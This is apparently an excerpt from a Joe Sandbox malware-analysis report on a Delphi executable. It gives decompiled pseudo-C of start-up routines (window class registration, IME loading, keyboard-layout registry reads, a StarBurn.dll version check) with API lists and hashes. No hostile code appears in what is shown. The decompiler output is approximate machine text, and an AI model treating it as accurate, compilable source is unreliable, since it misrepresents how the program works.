      				intOrPtr _t64;
      				void* _t69;
      				struct HMENU__* _t70;
      				void* _t71;
      				intOrPtr _t77;
      				void* _t83;
      				short _t88;
      
      				_t71 = __ecx;
      				_v48 = 0;
      				_t69 = __eax;
      				_push(_t83);
      				_push(0x463451);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t83 + 0xffffffd4;
      				if( *((char*)(__eax + 0xa4)) != 0) {
      					L13:
      					_pop(_t77);
      					 *[fs:eax] = _t77;
      					_push(0x463458);
      					return E00404A40( &_v48);
      				}
      				_t22 =  *0x48f8c0; // 0x490048
      				if( *_t22 != 0) {
      					goto L13;
      				}
      				_t23 = E00423758(E00463830, __eax); // executed
      				 *(_t69 + 0x40) = _t23;
      				 *0x48ef0c = L00407550;
      				_t26 =  *0x48ef2c; // 0x462f84
      				_t27 =  *0x490664; // 0x400000
      				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
      					_t62 =  *0x490664; // 0x400000
      					 *0x48ef18 = _t62;
      					_t88 = RegisterClassA(0x48ef08);
      					if(_t88 == 0) {
      						_t64 =  *0x48f5e4; // 0x423ae8
      						E00406A3C(_t64, _t71,  &_v48);
      						E0040CBEC(_v48, 1);
      						E004043D0();
      					}
      				}
      				_t29 =  *0x48f6b0; // 0x490904
      				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
      				if(_t88 < 0) {
      					asm("adc eax, 0x0");
      				}
      				_t33 =  *0x48f6b0; // 0x490904
      				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
      				if(_t88 < 0) {
      					asm("adc eax, 0x0");
      				}
      				_push(_t36);
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_t37 =  *0x490664; // 0x400000
      				_push(_t37);
      				_push(0);
      				_t7 = _t69 + 0x8c; // 0x84140045
      				_t39 = E00404F00( *_t7);
      				_t40 =  *0x48ef2c; // 0x462f84, executed
      				_t41 = E00407B24(_t40, _t39); // executed
      				 *(_t69 + 0x30) = _t41;
      				_t9 = _t69 + 0x8c; // 0x45b290
      				E00404A40(_t9);
      				 *((char*)(_t69 + 0xa4)) = 1;
      				_t11 = _t69 + 0x40; // 0x10c80000
      				_t12 = _t69 + 0x30; // 0xe
      				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
      				_t47 =  *0x48f73c; // 0x490ae0
      				if( *_t47 != 0) {
      					_t55 = E00463F30(_t69);
      					_t13 = _t69 + 0x30; // 0xe
      					SendMessageA( *_t13, 0x80, 1, _t55); // executed
      					_t59 = E00463F30(_t69);
      					_t14 = _t69 + 0x30; // 0xe
      					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
      				}
      				_t15 = _t69 + 0x30; // 0xe
      				_t70 = GetSystemMenu( *_t15, "true");
      				DeleteMenu(_t70, 0xf030, 0);
      				DeleteMenu(_t70, 0xf000, 0);
      				_t52 =  *0x48f73c; // 0x490ae0
      				if( *_t52 != 0) {
      					DeleteMenu(_t70, 0xf010, 0);
      				}
      				goto L13;
      			}

      APIs
        • Part of subcall function 00423758: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042377F
      • GetClassInfoA.USER32 ref: 0046330F
      • RegisterClassA.USER32 ref: 00463327
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      • SetWindowLongA.USER32 ref: 004633C3
      • SendMessageA.USER32 ref: 004633E5
      • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10C80000,0045B204), ref: 004633F8
      • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 00463403
      • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 00463412
      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 0046341F
      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10C80000,0045B204), ref: 00463436
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
      • String ID: Pu@$TsA$I$:B
      • API String ID: 2103932818-4014100627
      • Opcode ID: 5675b7ad24d272adfe38eb4a866342c0b0a94ea0e50764adf944712c1cdbd5b9
      • Instruction ID: 3a5adff0ba3c83bfe3925a1dc9cf6b8907eacc9c916d56076b9719665dda5c00
      • Opcode Fuzzy Hash: 5675b7ad24d272adfe38eb4a866342c0b0a94ea0e50764adf944712c1cdbd5b9
      • Instruction Fuzzy Hash: E3414071B442806FE711EF69DC82F5A33A8AB45704F54447AFA00EB2D2EB78BD00872D
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 86%
      			E0044FFC4(void* __ebx, void* __edi, void* __eflags) {
      				char _v8;
      				char _v12;
      				char _v16;
      				char _v20;
      				char _v24;
      				long _v28;
      				char _v32;
      				char _v36;
      				intOrPtr _t25;
      				short _t27;
      				char _t29;
      				intOrPtr _t35;
      				intOrPtr _t38;
      				intOrPtr _t47;
      				intOrPtr _t49;
      				intOrPtr* _t50;
      				intOrPtr _t53;
      				struct HINSTANCE__* _t63;
      				intOrPtr* _t78;
      				intOrPtr* _t80;
      				intOrPtr _t83;
      				void* _t87;
      
      				_v20 = 0;
      				_v8 = 0;
      				_push(_t87);
      				_push(0x45013c);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t87 + 0xffffffe0;
      				_v16 = GetCurrentProcessId();
      				_v12 = 0;
      				E0040A164("Delphi%.8X", 0,  &_v16,  &_v8);
      				E00404A94(0x490aec, _v8);
      				_t25 =  *0x490aec; // 0x2480dd0
      				_t27 = GlobalAddAtomA(E00404F00(_t25)); // executed
      				 *0x490ae8 = _t27;
      				_t29 =  *0x490664; // 0x400000
      				_v36 = _t29;
      				_v32 = 0;
      				_v28 = GetCurrentThreadId();
      				_v24 = 0;
      				E0040A164("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
      				E00404A94(0x490af0, _v20);
      				_t35 =  *0x490af0; // 0x2480dec
      				 *0x490aea = GlobalAddAtomA(E00404F00(_t35));
      				_t38 =  *0x490af0; // 0x2480dec
      				 *0x490af4 = RegisterClipboardFormatA(E00404F00(_t38));
      				 *0x490b2c = E00419F14(1);
      				E0044FBC8();
      				 *0x490adc = E0044F9F0(1, 1);
      				_t47 = E00461DA8(1, __edi);
      				_t78 =  *0x48f9b8; // 0x490b80
      				 *_t78 = _t47;
      				_t49 = E00462F94(0, 1);
      				_t80 =  *0x48f840; // 0x490b7c
      				 *_t80 = _t49;
      				_t50 =  *0x48f840; // 0x490b7c
      				E00464D04( *_t50, 1);
      				_t53 =  *0x43efd4; // 0x43efd8
      				E00419430(_t53, 0x441a0c, 0x441a1c);
      				_t63 = GetModuleHandleA("USER32");
      				if(_t63 != 0) {
      					 *0x48ebd4 = GetProcAddress(_t63, "AnimateWindow");
      				}
      				_pop(_t83);
      				 *[fs:eax] = _t83;
      				_push(0x450143);
      				E00404A40( &_v20);
      				return E00404A40( &_v8);
      			}

      APIs
      • GetCurrentProcessId.KERNEL32(?,00000000,0045013C), ref: 0044FFE5
      • GlobalAddAtomA.KERNEL32 ref: 00450018
      • GetCurrentThreadId.KERNEL32 ref: 00450033
      • GlobalAddAtomA.KERNEL32 ref: 00450069
      • RegisterClipboardFormatA.USER32(00000000), ref: 0045007F
        • Part of subcall function 00419F14: RtlInitializeCriticalSection.KERNEL32(0041747C,?,?,00423A41,00000000,00423A65), ref: 00419F33
        • Part of subcall function 0044FBC8: SetErrorMode.KERNEL32(00008000), ref: 0044FBE1
        • Part of subcall function 0044FBC8: GetModuleHandleA.KERNEL32(USER32,00000000,0044FD2E,?,00008000), ref: 0044FC05
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044FC12
        • Part of subcall function 0044FBC8: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044FD2E,?,00008000), ref: 0044FC2E
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044FC50
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 0044FC65
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044FC7A
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044FC8F
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 0044FCA4
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 0044FCB9
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044FCCE
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044FCE3
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044FCF8
        • Part of subcall function 0044FBC8: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0044FD0D
        • Part of subcall function 0044FBC8: SetErrorMode.KERNEL32(?,0044FD35,00008000), ref: 0044FD28
        • Part of subcall function 00461DA8: GetKeyboardLayout.USER32 ref: 00461DED
        • Part of subcall function 00461DA8: 73BEAC50.USER32(00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E42
        • Part of subcall function 00461DA8: 73BEAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E4C
        • Part of subcall function 00461DA8: 73BEB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?), ref: 00461E57
        • Part of subcall function 00462F94: LoadIconA.USER32(00400000,MAINICON), ref: 00463079
        • Part of subcall function 00462F94: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 004630AB
        • Part of subcall function 00462F94: OemToCharA.USER32 ref: 004630BE
        • Part of subcall function 00462F94: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000), ref: 0046310B
        • Part of subcall function 00462F94: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?), ref: 00463111
      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00450103
      • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00450114
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
      • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$ttA
      • API String ID: 1368734802-283336520
      • Opcode ID: 8138e431131322c61892cc95c64641ff2333261e0fd24f17018ba8d4d6d6d2ed
      • Instruction ID: 391add8d6df546983462eea8a1e4386065a5c7db987ae060372cebaeae235c7a
      • Opcode Fuzzy Hash: 8138e431131322c61892cc95c64641ff2333261e0fd24f17018ba8d4d6d6d2ed
      • Instruction Fuzzy Hash: E6413074A043459FCB00EFB5EC42A4E77A4EB59308B50853BF501E73A2DB79A9048B9E
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 79%
      			E004622CC(intOrPtr __eax, void* __ebx, void* __fp0) {
      				intOrPtr _v8;
      				int _v12;
      				void* _v16;
      				signed int _v20;
      				char _v24;
      				intOrPtr* _v28;
      				struct HKL__* _v284;
      				char _v540;
      				char _v604;
      				char _v608;
      				intOrPtr _v612;
      				char _v616;
      				int _t66;
      				intOrPtr _t77;
      				long _t81;
      				long _t88;
      				void* _t105;
      				intOrPtr _t107;
      				intOrPtr _t118;
      				intOrPtr _t125;
      				void* _t132;
      				void* _t133;
      				intOrPtr _t134;
      				void* _t146;
      
      				_t146 = __fp0;
      				_t132 = _t133;
      				_t134 = _t133 + 0xfffffd9c;
      				_v616 = 0;
      				_v8 = __eax;
      				_push(_t132);
      				_push(0x46249c);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t134;
      				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
      					L15:
      					_pop(_t118);
      					 *[fs:eax] = _t118;
      					_push(0x4624a3);
      					return E00404A40( &_v616);
      				} else {
      					 *((intOrPtr*)(_v8 + 0x34)) = E00403BC0(1);
      					E00404A40(_v8 + 0x38);
      					_t66 = GetKeyboardLayoutList(0x40,  &_v284);
      					_v20 = GetSystemDefaultLangID() & 0x0000ffff;
      					_t105 = _t66 - 1;
      					if(_t105 < 0) {
      						L14:
      						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
      						E0041C0E8( *((intOrPtr*)(_v8 + 0x34)), 1);
      						goto L15;
      					} else {
      						_v24 = _t105 + 1;
      						_v28 =  &_v284;
      						while(E0044FF28( *_v28) == 0 &&  *_v28 !=  *((intOrPtr*)(_v8 + 0x3c))) {
      							_v28 = _v28 + 4;
      							_t45 =  &_v24;
      							 *_t45 = _v24 - 1;
      							if( *_t45 != 0) {
      								continue;
      							} else {
      								goto L14;
      							}
      							goto L16;
      						}
      						_push(_t132);
      						_push(0x462458);
      						_push( *[fs:edx]);
      						 *[fs:edx] = _t134;
      						_t77 =  *_v28;
      						if(_t77 !=  *((intOrPtr*)(_v8 + 0x3c))) {
      							_t107 = _t77;
      						} else {
      							_t20 =  &_v20; // 0x446f48
      							_t107 =  *_t20;
      						}
      						_v612 = _t107;
      						_v608 = 0;
      						_t81 = RegOpenKeyExA(0x80000002, E0040A0CC( &_v604, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t146, 0), 0, 0x20019,  &_v16); // executed
      						if(_t81 == 0) {
      							_v12 = 0x100;
      							_t88 = RegQueryValueExA(_v16, "layout text", 0, 0,  &_v540,  &_v12); // executed
      							if(_t88 == 0) {
      								E00404CB0( &_v616, 0x100,  &_v540);
      								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
      								if( *_v28 ==  *((intOrPtr*)(_v8 + 0x3c))) {
      									E00404CB0(_v8 + 0x38, 0x100,  &_v540);
      								}
      							}
      						}
      						_pop(_t125);
      						 *[fs:eax] = _t125;
      						_push(0x46245f);
      						return RegCloseKey(_v16);
      					}
      				}
      				L16:
      			}

      APIs
      • GetKeyboardLayoutList.USER32(00000040,?,00000000,0046249C,?,02480E74,?,004624FD,00000000,?,00446EF3), ref: 00462322
      • GetSystemDefaultLangID.KERNEL32(00000040,?,00000000,0046249C,?,02480E74,?,004624FD,00000000,?,00446EF3), ref: 00462329
      • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004623C1
      • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,80000002,00000000), ref: 004623E9
      • RegCloseKey.ADVAPI32(?,0046245F), ref: 00462452
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CloseDefaultKeyboardLangLayoutListOpenQuerySystemValue
      • String ID: HoD$System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text$tzA
      • API String ID: 34517754-2195660679
      • Opcode ID: bcd99a5c8c93ff9971ae5b3fd8698a95235a489e1aca05edaa7752c5ca1ddf37
      • Instruction ID: 3fbebc5d05554b2806ba6c1b55b389240d17e9f64fafa1af66ff3ea040d684e1
      • Opcode Fuzzy Hash: bcd99a5c8c93ff9971ae5b3fd8698a95235a489e1aca05edaa7752c5ca1ddf37
      • Instruction Fuzzy Hash: B5513074A04609EFDB10DF95C981B9EB7B5EB48304F5040A6EA04EB351EB78AE41CB55
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 94%
      			E00462F94(void* __ecx, char __edx) {
      				char _v5;
      				char* _v12;
      				char _v268;
      				void* __ebx;
      				void* __ebp;
      				intOrPtr _t44;
      				intOrPtr _t47;
      				intOrPtr _t48;
      				struct HINSTANCE__** _t58;
      				struct HICON__* _t60;
      				intOrPtr _t63;
      				struct HINSTANCE__** _t65;
      				CHAR* _t76;
      				char* _t80;
      				intOrPtr _t86;
      				intOrPtr* _t94;
      				intOrPtr* _t95;
      				intOrPtr _t96;
      				void* _t97;
      				char _t99;
      				void* _t111;
      				void* _t112;
      
      				_t99 = __edx;
      				_t97 = __ecx;
      				if(__edx != 0) {
      					_t112 = _t112 + 0xfffffff0;
      					_t44 = E00403F68(_t44, _t111);
      				}
      				_v5 = _t99;
      				_t96 = _t44;
      				E004226B0(_t97, 0);
      				_t47 =  *0x48f794; // 0x48e470
      				if( *((short*)(_t47 + 2)) == 0) {
      					_t95 =  *0x48f794; // 0x48e470
      					 *((intOrPtr*)(_t95 + 4)) = _t96;
      					 *_t95 = 0x464734;
      				}
      				_t48 =  *0x48f86c; // 0x48e478
      				if( *((short*)(_t48 + 2)) == 0) {
      					_t94 =  *0x48f86c; // 0x48e478
      					 *((intOrPtr*)(_t94 + 4)) = _t96;
      					 *_t94 = E0046492C;
      				}
      				 *((char*)(_t96 + 0x34)) = 0;
      				 *((intOrPtr*)(_t96 + 0x90)) = E00403BC0(1);
      				 *((intOrPtr*)(_t96 + 0xa8)) = E00403BC0(1);
      				 *((intOrPtr*)(_t96 + 0x60)) = 0;
      				 *((intOrPtr*)(_t96 + 0x84)) = 0;
      				 *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
      				 *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
      				 *((char*)(_t96 + 0x7c)) = 1;
      				 *((intOrPtr*)(_t96 + 0x80)) = 0;
      				 *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
      				 *((char*)(_t96 + 0x88)) = 0;
      				 *((char*)(_t96 + 0x9d)) = 1;
      				 *((char*)(_t96 + 0xb4)) = 1;
      				 *((intOrPtr*)(_t96 + 0x98)) = E0042C1B0(1);
      				_t58 =  *0x48f690; // 0x49002c
      				_t60 = LoadIconA( *_t58, "MAINICON"); // executed
      				E0042C580(_t57, _t60);
      				_t20 = _t96 + 0x98; // 0x736d
      				_t63 =  *_t20;
      				 *((intOrPtr*)(_t63 + 0x14)) = _t96;
      				 *((intOrPtr*)(_t63 + 0x10)) = 0x464f8c;
      				_t65 =  *0x48f690; // 0x49002c
      				GetModuleFileNameA( *_t65,  &_v268, 0x100);
      				OemToCharA( &_v268,  &_v268);
      				_v12 = E0040DA70( &_v268, _t97, 0x5c);
      				if(_v12 != 0) {
      					E00409A80( &_v268, _v12 + 1);
      				}
      				_v12 = E0040DAB8( &_v268, _t97, 0x2e);
      				if(_v12 != 0) {
      					 *_v12 = 0;
      				}
      				_t76 = CharNextA( &_v268); // executed
      				CharLowerA(_t76);
      				_t36 = _t96 + 0x8c; // 0x45b290
      				E00404CB0(_t36, 0x100,  &_v268);
      				_t80 =  *0x48f54c; // 0x490034
      				if( *_t80 == 0) {
      					E004632B0(_t96, _t96, 0x100); // executed
      				}
      				 *((char*)(_t96 + 0x59)) = 1;
      				 *((char*)(_t96 + 0x5a)) = 1;
      				 *((char*)(_t96 + 0x5b)) = 1;
      				 *((char*)(_t96 + 0x9e)) = 1;
      				 *((intOrPtr*)(_t96 + 0xa0)) = 0;
      				E00465168(_t96, 0x100);
      				E00465B50(_t96);
      				_t86 = _t96;
      				if(_v5 != 0) {
      					E00403FC0(_t86);
      					_pop( *[fs:0x0]);
      				}
      				return _t96;
      			}

      APIs
      • LoadIconA.USER32(00400000,MAINICON), ref: 00463079
      • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 004630AB
      • OemToCharA.USER32 ref: 004630BE
      • CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000), ref: 0046310B
      • CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?), ref: 00463111
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Char$FileIconLoadLowerModuleNameNext
      • String ID: MAINICON$pH$xH$LB
      • API String ID: 3256280155-839228162
      • Opcode ID: 10fb2bccad939b0ef69921457b801be0322e4418ff689b690ef743c3924512d7
      • Instruction ID: dca05ea63cd1a85dfc27a3f2294c79b283ffa00040fb4e0873e4301a971301c9
      • Opcode Fuzzy Hash: 10fb2bccad939b0ef69921457b801be0322e4418ff689b690ef743c3924512d7
      • Instruction Fuzzy Hash: 1E516270A042449FD741DF79C8857C97BF4AB15308F0484BAE848DF357DBB99988CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • StarBurn_GetVersion.STARBURN(00000000,00466053,?,?,00000000,00000000,00000000), ref: 00465F91
      • OutputDebugStringA.KERNEL32(00000000,00000000,00466053,?,?,00000000,00000000,00000000), ref: 00465FCC
      • StarBurn_GetVersion.STARBURN(StarBurn.pas : Invalid StarBurn.dll version : 0x,00000000,00466053,?,?,00000000,00000000,00000000), ref: 00465FD8
      • OutputDebugStringA.KERNEL32(00000000,?,. Expected : 0x,?,StarBurn.pas : Invalid StarBurn.dll version : 0x,00000000,00466053,?,?,00000000,00000000,00000000), ref: 00466027
      • MessageBoxA.USER32 ref: 00466033
      Strings
      • StarBurn.pas : Invalid StarBurn.dll version : 0x, xrefs: 00465FD3
      • . Expected : 0x, xrefs: 00465FF1
      • StarBurn.pas : StarBurn.dll version : 0x, xrefs: 00465FB7
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_DebugOutputStarStringVersion$Message
      • String ID: . Expected : 0x$StarBurn.pas : Invalid StarBurn.dll version : 0x$StarBurn.pas : StarBurn.dll version : 0x
      • API String ID: 1122037688-713117416
      • Opcode ID: 3c130b23401de5555b2e6095d47403038927431b8245b91cbd70a617800f09b8
      • Instruction ID: 374ffedddccb8af46b8dfbe9ec3ecb6321eea10d350ee8c4e67df093beebe6db
      • Opcode Fuzzy Hash: 3c130b23401de5555b2e6095d47403038927431b8245b91cbd70a617800f09b8
      • Instruction Fuzzy Hash: ED119074A10200BFE714E7E6CC52B5E7669EB85708F61847BB640B66C2DA3C6D04866F
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 84%
      			E00461DA8(char __edx, void* __edi) {
      				char _v5;
      				void* __ebx;
      				void* __ecx;
      				void* __ebp;
      				intOrPtr _t25;
      				intOrPtr* _t28;
      				intOrPtr* _t29;
      				intOrPtr _t42;
      				intOrPtr* _t45;
      				intOrPtr _t56;
      				intOrPtr _t57;
      				intOrPtr _t58;
      				intOrPtr _t59;
      				intOrPtr _t62;
      				void* _t63;
      				char _t64;
      				void* _t74;
      				intOrPtr _t75;
      				void* _t76;
      				void* _t77;
      
      				_t74 = __edi;
      				_t64 = __edx;
      				if(__edx != 0) {
      					_t77 = _t77 + 0xfffffff0;
      					_t25 = E00403F68(_t25, _t76);
      				}
      				_v5 = _t64;
      				_t62 = _t25;
      				E004226B0(_t63, 0);
      				_t28 =  *0x48f620; // 0x48e460
      				 *((intOrPtr*)(_t28 + 4)) = _t62;
      				 *_t28 = 0x46214c;
      				_t29 =  *0x48f630; // 0x48e468
      				 *((intOrPtr*)(_t29 + 4)) = _t62;
      				 *_t29 = 0x462158;
      				E00462164(_t62);
      				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
      				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BC0(1);
      				 *((intOrPtr*)(_t62 + 0x50)) = E00403BC0(1);
